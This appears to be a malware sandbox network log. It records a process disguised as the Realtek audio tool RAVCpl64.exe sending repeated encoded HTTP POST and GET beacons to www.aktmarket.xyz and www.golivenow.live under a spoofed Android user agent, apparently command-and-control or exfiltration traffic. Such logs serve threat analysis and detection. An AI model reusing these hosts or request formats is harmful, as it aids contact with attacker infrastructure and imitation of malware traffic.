                                                                                                  67192.168.11.304993313.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:52.284377098 CET695OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 31 69 77 48 61 36 30 69 72 44 41 78 6b 63 45 59 71 38 32 32 56 70 4d 36 73 36 48 74 62 76 52 2b 55 3d
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZ1iwHa60irDAxkcEYq822VpM6s6HtbvR+U=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  68192.168.11.304993513.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:54.928535938 CET1289OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 2b 58 6d 55 6d 39 75 4d 38 53 6b 62 42 38 49 77 44 78 69 4d 45 57 79 78 73 6d 38 54 33 31 61 4f 78 5a 47 4b 59 66 72 65 4f 2b 39 44 66 35 6f 39 33 75 37 6a 53 76 54 43 43 55 71 4a 35 58 43 36 43 52 32 49 75 5a 75 54 64 2b 70 53 37 6b 4a 4f 62 4e 52 7a 53 63 35 37 69 61 6c 6c 72 4c 2b 78 41 32 42 2f 37 64 75 6f 75 75 56 2f 76 31 35 39 59 75 41 7a 68 4c 35 74 31 63 58 72 56 41 49 66 4a 2b 62 73 45 4b 6d 46 75 34 73 53 49 4c 63 4a 32 79 54 79 73 38 7a 56 54 6d 41 46 44 47 41 68 62 79 39 70 62 77 31 5a 55 45 45 67 6e 64 4a 6d 78 63 38 54 42 67 61 39 53 36 55 34 74 49 6a 61 58 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WET+XmUm9uM8SkbB8IwDxiMEWyxsm8T31aOxZGKYfreO+9Df5o93u7jSvTCCUqJ5XC6CR2IuZuTd+pS7kJObNRzSc57iallrL+xA2B/7duouuV/v159YuAzhL5t1cXrVAIfJ+bsEKmFu4sSILcJ2yTys8zVTmAFDGAhby9pbw1ZUEEgndJmxc8TBga9S6U4tIjaXoMaqTVranpNOUoZb0hf6V1ExWYtogK+vNNdtTJ0blcaufM7rpzXB1Cu2l9WCjuR3oLNC6yF9QnrVxR5PQyssiQ4lJNKrBOJfuKzlN83Pm5mSO4Lp65cld4+99ClfjEoforrohWEiWa4Cz7sNFGVnfKsOUOJghs36Sh5NFYD8336VPjvGJEUvr5O/hb06Yiqhru+L2KgS+P96M9h5qPN5kT+yYusF7bRAJfBhfIheybRHf3SdWGFc3tRF4N7Jc/1Ue5Gw0YoDrxFJqjpJ3Xzpw0anpEE3rem2rDE/dJiXHlmFMo36+V2XfKTbcTuXb3XfUQPqdy5C5RiwsBOUp1a97VWiYgC4frSp0SX5JLpUqQkw6ri0+eQI8tyzaxFMF57RG0e6wTFzw8vCtpYujDg0P0k7zHYxozCrEf1E7HhjfNZIHboQJYsoZggcgn+Fd0oYrFQkOfsA4JBbARbM7PFd4pcpVtDXD50
                                                                                                  Dec 3, 2024 09:51:54.928617001 CET2523OUTData Raw: 55 75 71 42 78 79 38 71 4d 65 74 79 50 48 45 61 46 7a 2f 41 70 37 70 75 75 6b 37 38 45 5a 4b 79 59 42 75 64 75 4e 37 6e 75 50 6c 5a 4a 52 63 75 53 6c 53 72 57 70 39 37 69 6f 48 45 78 6a 74 4c 69 4a 2f 50 32 76 69 4a 37 74 6a 75 2f 52 6e 7a 44 72
                                                                                                  Data Ascii: UuqBxy8qMetyPHEaFz/Ap7puuk78EZKyYBuduN7nuPlZJRcuSlSrWp97ioHExjtLiJ/P2viJ7tju/RnzDrtIvIqVKjnzgPq8pdTklMbacfybCWMf58ijyosmQQ/xdUh1EqbDfhlzBDBGJIXcMk2nS06L/7YjVBpS66HnayM4SR4PKK+eDFxltwQCtsim31/W7vaFnmcHKHuy/YigmiLjzL8+lBYys2DTybSlw5OJtjSZbV/YjZx


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  69192.168.11.304993613.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:57.562145948 CET414OUTGET /wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:51:57.672314882 CET405INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 03 Dec 2024 08:51:57 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 265
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 61 6f 6e 6c 35 78 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 59 37 72 79 6a 62 78 43 70 70 48 69 39 4f 6d 7a 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 33 45 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 49 65 49 71 61 6f 49 59 75 73 47 69 44 7a 49 63 70 48 50 4f 73 33 42 31 71 59 54 76 72 64 30 51 6a 30 73 3d 26 77 59 48 6b 3d 4d 5f 42 2d 67 68 63 32 48 71 6f 57 68 6d 65 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  70192.168.11.304993766.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:02.855634928 CET678OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 4f 76 2f 33 68 6c 48 45 7a 63 58 56 6e 5a 4a 77 47 36 32 53 71 56 33 7a 51 51 39 75 56 53 6f 41 31 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStOv/3hlHEzcXVnZJwG62SqV3zQQ9uVSoA1Q==
                                                                                                  Dec 3, 2024 09:52:03.034406900 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:02 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  71192.168.11.304993866.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:05.557306051 CET698OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 4c 65 4d 52 51 47 58 51 70 62 6f 57 44 35 74 53 6d 59 63 4b 41 57 6c 6f 55 4c 42 32 57 33 53 2b 63 3d
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51LeMRQGXQpboWD5tSmYcKAWloULB2W3S+c=
                                                                                                  Dec 3, 2024 09:52:05.738183022 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:05 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  72192.168.11.304993966.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:08.260241985 CET2578OUTPOST /r2k9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.golivenow.live
                                                                                                  Referer: http://www.golivenow.live/r2k9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 6a 67 54 72 64 31 55 55 6a 38 5a 71 58 48 5a 39 65 34 72 58 67 58 59 42 64 44 5a 78 48 44 44 71 63 57 67 72 66 42 6e 65 36 71 70 6a 48 62 58 45 6c 45 45 59 43 78 51 77 57 2f 39 72 54 48 68 4b 62 67 68 75 65 4e 66 66 6a 4f 51 45 5a 4d 73 4a 58 50 64 34 46 44 77 32 78 77 64 43 43 43 45 4c 32 31 7a 70 39 67 52 4b 79 6e 56 63 63 58 34 36 51 39 65 6d 5a 4a 49 31 65 4b 64 73 33 74 75 2f 75 57 57 78 66 6e 72 36 64 6e 5a 76 33 6a 5a 61 41 73 50 66 6d 67 33 76 4a 41 47 44 51 73 64 54 78 75 56 59 5a 6d 39 48 63 49 31 6c 45 50 62 6d 52 71 58 72 36 57 34 69 78 53 63 37 69 56 50 67 67 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubjgTrd1UUj8ZqXHZ9e4rXgXYBdDZxHDDqcWgrfBne6qpjHbXElEEYCxQwW/9rTHhKbghueNffjOQEZMsJXPd4FDw2xwdCCCEL21zp9gRKynVccX46Q9emZJI1eKds3tu/uWWxfnr6dnZv3jZaAsPfmg3vJAGDQsdTxuVYZm9HcI1lEPbmRqXr6W4ixSc7iVPgg3R0rfMFlrruUO37vlY8YsbLl1IE0HnqToyHOr0lUZiXdR0J9hxs4o1lbmhYa7nw5DOTMh7dg8Hz0x+U6XFMr93nHIkolEZYn5PmOHMgh2LaMC0Xlubf9wATz4gMBf5HXPVqtfl3I8077UzzPqsB4dkLzE7IB4B1sSJOHCJ2IWR+bz6soSi+sngo/QJmTEDCq0NjMlTnxH9eCAnv0b2ildGTEOtewXkGJHotIsLhzV54hsAzjCqKpNuqL1urBiHgG0SiB/1Xr+vRgkkvKNR/NV8aSZZFIM/vpqk9FKuaaWlTPRKrESec+XvJEhjWvCNOLVHrOTzgEyi6RIVvxALCD8h46G3OXqwtlotvFxleeM2q0JVaAsPykSV3vnP6euPDFK6z7VqKoZTqSuZXm+thpV76NPAdUSVDszkKRPanbqpjA9Ha/JmjM80RPF/dhInh9Pqa6KlgRqcfPvMIk2UDHiQsUccS/qQ+0xW8B7ZrV8g7n1uJ+w00IdpUbvov4M+mh5p79yszlxIt+VlSINzh8+OoVZO85c65qRaXqPr/ZYJprpV3dm/tbcTQzlyV5z7NLT2L1oXdQSkv6wt/NAnrQA263jkmVPNyzrQHkUWeA8Ui1Dl5SbxqTQgpm+hcRXb8DAeUC2/4WKFRGSz1plrwaJ6xZzDPSt1bKS4 [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:08.260291100 CET1237OUTData Raw: 66 43 6e 66 4e 52 43 38 33 35 7a 63 6f 67 4b 2b 44 63 58 4e 50 51 43 2b 4c 70 63 71 51 65 4f 78 4c 53 36 58 6a 38 5a 67 4b 64 69 4b 78 45 31 42 71 36 6b 30 4f 59 35 54 74 31 72 42 65 67 32 41 67 35 38 42 79 73 6b 30 36 48 50 56 4e 2b 2f 51 33 4e
                                                                                                  Data Ascii: fCnfNRC835zcogK+DcXNPQC+LpcqQeOxLS6Xj8ZgKdiKxE1Bq6k0OY5Tt1rBeg2Ag58Bysk06HPVN+/Q3NgwIAk7hd93AsP9F4bSOJfEH+FFsuFlZ8qkm5rypu0/ik/l4nbYn9j/rl1dgCHV10W0EO7VERkRVdX10yuGzIhsrk32LJ6Cm6ZBZVmjbSAvT9hX45jXahXukQ2e0JZqIz5FWphXTRkKsXfegUL7mlBt+zZ0qwISgsc
                                                                                                  Dec 3, 2024 09:52:08.457756042 CET637INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:08 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  73192.168.11.304994066.29.149.46805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:10.963670969 CET415OUTGET /r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.golivenow.live
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:52:11.145595074 CET652INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:11 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 493
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=utf-8
